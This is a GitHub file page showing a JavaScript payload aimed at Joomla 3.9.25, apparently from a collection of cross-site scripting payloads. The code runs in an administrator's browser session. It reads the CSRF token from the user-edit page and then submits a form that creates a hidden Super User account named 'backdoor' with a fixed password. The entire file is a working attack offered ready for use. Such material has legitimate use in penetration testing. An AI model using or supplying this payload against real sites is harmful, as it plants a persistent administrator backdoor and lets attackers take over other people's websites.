-
Notifications
You must be signed in to change notification settings - Fork 216
/
joomla_create_admin_user.js
105 lines (104 loc) · 4.33 KB
/
joomla_create_admin_user.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
/*
Target: Joomla! - tested on 3.9.25 but probably works on older versions
Action: Create a new administrative user with username "backdoor" and password "backdoor123"
Context: Must be executed in the context of an administrator user
*/
var joomla_root = ""
var req = new XMLHttpRequest();
var url = joomla_root + "/administrator/index.php?option=com_users&view=user&layout=edit";
var regex = /"csrf.token":"([^"]*?)"/g;
req.open("GET", url, false);
req.send();
var token = regex.exec(req.responseText)[1];
req.open("POST", url, true);
req.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------40312619018197013893860115245");
req.withCredentials = true;
var body = "-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[name]\"\r\n" +
"\r\n" +
"backdoor\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[username]\"\r\n" +
"\r\n" +
"backdoor\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[password]\"\r\n" +
"\r\n" +
"backdoor123\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[password2]\"\r\n" +
"\r\n" +
"backdoor123\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[email]\"\r\n" +
"\r\n" +
"backdoor@backdoor.com\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[registerDate]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[lastvisitDate]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[lastResetTime]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[resetCount]\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[sendEmail]\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[block]\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[requireReset]\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[id]\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[groups][]\"\r\n" +
"\r\n" +
"8\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[params][admin_style]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[params][admin_language]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[params][language]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[params][editor]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[params][timezone]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"task\"\r\n" +
"\r\n" +
"user.apply\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"" + token + "\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------40312619018197013893860115245--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
req.send(new Blob([aBody]));